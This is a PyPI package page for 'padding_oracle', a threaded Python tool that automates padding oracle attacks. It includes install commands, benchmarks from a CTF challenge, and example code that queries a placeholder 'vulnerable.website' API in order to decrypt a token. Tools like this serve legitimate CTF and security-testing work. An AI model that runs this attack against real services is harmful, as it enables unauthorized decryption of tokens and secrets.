Threaded padding oracle automation.
Project description
padding_oracle.py
Fast threaded padding oracle attack automation script for Python 3.
Install
PyPI:
pip3 install -U padding_oracle
GitHub:
pip3 install -U git+https://github.com/djosix/padding_oracle.py.git
Performance
Tested on [0x09] Cathub Party from EDU-CTF:
| Request Threads | Execution Time |
|---|---|
| 1 | 17m 43s |
| 4 | 5m 23s |
| 16 | 1m 20s |
| 64 | 56s |
Usage
E.g. testing https://vulnerable.website/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D:
from padding_oracle import padding_oracle, base64_encode, base64_decode
import requests
sess = requests.Session() # use connection pool
url = 'https://vulnerable.website/api/'
def oracle(ciphertext: bytes):
resp = sess.get(url, params={'token': base64_encode(ciphertext)})
if 'failed' in resp.text:
return False # e.g. token decryption failed
elif 'success' in resp.text:
return True
else:
raise RuntimeError('unexpected behavior')
ciphertext: bytes = base64_decode('M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94=')
# len(ciphertext) is 32
# possibly be "IV + cipher block" if block size is 16
assert len(ciphertext) % 16 == 0
plaintext = padding_oracle(
ciphertext,
block_size = 16,
oracle = oracle,
num_threads = 16,
)
This package also provides PHP-like encoding/decoding functions:
from padding_oracle.encoding import (
urlencode,
urldecode,
base64_encode,
base64_decode,
)
License
This project is licensed under the terms of the MIT license.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
padding_oracle-0.3.2.tar.gz
(8.2 MB
view hashes)
Built Distribution
Close
Hashes for padding_oracle-0.3.2-py3-none-any.whl
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | 98b8ee1ed2147acf910a751d1296491080ac893885af25ef4063639640aa980d |
|
| MD5 | 60d1cbe2c27b4d2814e602d76b077f00 |
|
| BLAKE2b-256 | 59b50feee70e1bcbfacd91de0a86f8873e21b1f53ff08ec807593084b59a46f0 |